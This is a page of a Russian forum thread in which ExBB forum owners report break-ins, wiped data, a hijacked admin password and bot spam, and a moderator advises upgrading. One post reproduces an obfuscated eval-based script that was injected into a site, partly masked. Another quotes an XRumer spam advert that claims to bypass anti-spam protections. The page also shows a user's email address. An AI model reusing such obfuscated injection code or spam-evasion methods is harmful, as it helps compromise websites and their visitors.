Strict Standards: Resource ID#18 used as offset, casting to integer (18) in /home/u1001/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#24 used as offset, casting to integer (24) in /home/u1001/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#26 used as offset, casting to integer (26) in /home/u1001/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#27 used as offset, casting to integer (27) in /home/u1001/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
ТвойWeb :: Обнаружена новая уязвимость в форуме ExBB [12]
ТвойWeb ТвойWeb
Качественный Европейский хостинг
Форум для чайников
 Чат на форуме      Помощь      Поиск      Пользователи


 Страниц (12): В начало « ... 4 5 6 7 8 9 10 11 [12] 

> Без описания
d31m07y1988
Отправлено: 29 Ноября, 2007 - 15:19:13
Post Id



Newbie


Покинул форум
Сообщений всего: 21
Дата рег-ции: Нояб. 2007  

Карма 0




Что мне делать??? Сегодня почти весь форум обнулился и + ко всему на форум невозможно зайти. Т.е. не действует логин и пароль.

сайт http://fsgt.kstu.ru/forum/

мой e-mail: d31m07y1988@gmail.com
 
 Top
Salagin
Отправлено: 05 Февраля, 2008 - 08:30:08
Post Id


Newbie


Покинул форум
Сообщений всего: 47
Дата рег-ции: Сент. 2005  
Откуда: Каракол, Киргизия

Карма 0




У меня пока нечто непонятное... Вчера свет дербанили, что мама не горюй, юпс на серваке крякнул. Сегодня форум пуст - ни тем, ни подфорумов. Я немного тупанул, сразу начал восстанавливать темы - куча тем появилась с одним постом. Потом залил из старого бэкапа allforums.php - все появилось, правда без последнего подфорума, потом прочитал тут про bak, перезалил - все устаканилось. Погрешил на то, что при выключении света файл allforums.php записывался, поэтому и обнулился. Однако, щас в асе приходит мессага с номера 833378 - Здарова. ещё пользуешься форумом exbb ? Типа с поддевкой... Не знаю теперь в какую сторону смотреть...
 
 Top
Рысенька
Отправлено: 30 Мая, 2008 - 13:09:24
Post Id



Newbie


Покинул форум
Сообщений всего: 1
Дата рег-ции: Май 2008  

Карма 0




Есть у кого-нибудь файл lib.zip со всеми заплатками на данный момент Смущение ?
 
 Top
sergey_zherdev
Отправлено: 02 Апреля, 2009 - 11:44:08
Post Id


Newbie


Покинул форум
Сообщений всего: 4
Дата рег-ции: Март 2009  

Карма 0




Здравствуйте! У меня проблема вот в чем. У меня была старинная версия форума, но злоумышленник стал менять админский пароль и вытворять всякое нехорошее. Я поменял версию на ExBB_FM_1.0_ RC1. Злоумышленник теперь может только обнулять мемберов с 1.php по 10.php. Что делать? Может быть изменить название папки мемберс? А где в коде прописать что у меня теперь мемберсы в другой папке?

Заранее спасибо!

ЗЫ. Ну что, никто не знает как с этим бороться?

(Отредактировано автором: 08 Апреля, 2009 - 23:07:15)

 
 Top
alexintour
Отправлено: 06 Апреля, 2009 - 15:06:02
Post Id



Newbie


Покинул форум
Сообщений всего: 7
Дата рег-ции: Янв. 2007  

Карма 0




Привет.

Не знаю, уязвимость форума или хостера, но уже некоторое время в некоторые файлы форума мне каким-то образом вписывают лишний код. Код примерно вот такой:
CODE:

<span id='*******'><script type="text/javascript">var jj=window[new String("e")+String.fromCharCode(118)+"a"+new String("l")](new String("e")+String.fromCharCode(118)+"a"+new String("l")); jj('\***\x75\x6**********x29\x3b'); </script></span>


.
Выход - ограничил права доступа к файлам (444). Но теперь дошло до отдельных топиков форума.

Если тема уже была рассмотрена, не пинайте слишком больно Улыбка
 
 Top
nota81
Отправлено: 06 Мая, 2009 - 20:30:51
Post Id


Newbie


Покинул форум
Сообщений всего: 2
Дата рег-ции: Май 2009  

Карма 0




Здравствуйте! Подскажите пожалуйста, есть ли спасение от таких заморочек? (У меня версия скрипта: ExBB All Mods 1.9.3 (InvisionBB Style) В файле Readme написано: Форум поддержки ExBB и ExBB Full Mods - http://tvoyweb.ru/forums)
Если можете то подскажите:
1) На форуме могут зарегистрироваться всякие боты и вообще в автоматическом режиме непонятные и ненужные аккаунты. Пишут такие сообщения:
Цитата:
XRumer 5.07 Palladium на полном автомате разместил этот текст у вас на сайте. Обошёл все защиты от постинга, активировал аккаунт по емейл, обошёл бан по IP. Многопоточно, с языковым таргетингом, системой вариаций, и многими другими возможностями.
Хотите разослать свои рекламные тексты по всему интернету? Программный комплекс XRumer 5.0 Palladium + Hrefer является незаменимым помошником для этих целей. Также способен массово рассылать персональные сообщения по всем форумам, по сайтам знакомств Mamba и Loveplanet. Уникальными возможностями комплекса являются обход графических защит, текстовых защит, Java защит.
Где приобрести XRUMER 5.0 Палладиум? Спросите Гугл

P.S. XRumer 2.9 и 3.0 устарели
P.P.S. ВНИМАНИЕ! С 15-го мая 2009-го года, всвязи с введением ряда инновационных технологий, цена на комплекс будет в очередной раз повышена: с $520 до $540

Особое внимание на это: Обошёл все защиты от постинга, активировал аккаунт по емейл, обошёл бан по IP.

Можно как то защититься от такого мусора на форуме?
2) Такой второй вопрос: При размещении второго подряд поста в теме, то второе сообщение лепит к первому в одно, с пометкой "Добавлено". В панели управления поставила такие настройки как в файле.
Прикреплено изображение (Нажмите для увеличения)
flud.jpg

(Отредактировано автором: 06 Мая, 2009 - 20:34:37)

 
 Top
yura3d
Отправлено: 06 Мая, 2009 - 23:58:44
Post Id


Super Member


Покинул форум
Сообщений всего: 624
Дата рег-ции: Июль 2007  
Откуда: Минск, Беларусь

Карма 17




nota81 пишет:
У меня версия скрипта: ExBB All Mods 1.9.3

У Вас левая, и к тому же крайне устаревшая версия форума. Обновляйтесь до последней версии ExBB FM 1.0 RC1
В последней версии защита от спама значительно усовершенствована, а также исправлены многочисленные ошибки предыдущих версий, добавлены новые функции и модули.

nota81 пишет:
В файле Readme написано: Форум поддержки ExBB и ExBB Full Mods - http://tvoyweb.ru/forums)

Поддержка последней версии осуществляется на форуме http://exbb.org/community/

nota81 пишет:
2) Такой второй вопрос: При размещении второго подряд поста в теме, то второе сообщение лепит к первому в одно, с пометкой "Добавлено". В панели управления поставила такие настройки как в файле.

В новой версии ExBB FM 1.0 RC1 есть возможность через админку отключить функцию склеивания сообщений, либо установить для неё временной интрервал.
 
 Top
nota81
Отправлено: 07 Мая, 2009 - 00:19:22
Post Id


Newbie


Покинул форум
Сообщений всего: 2
Дата рег-ции: Май 2009  

Карма 0




Спасибо большое Вам! Хорошая информация. Будем исправлять и обновлять... Улыбка
 
 Top
Страниц (12): В начало « ... 4 5 6 7 8 9 10 11 [12]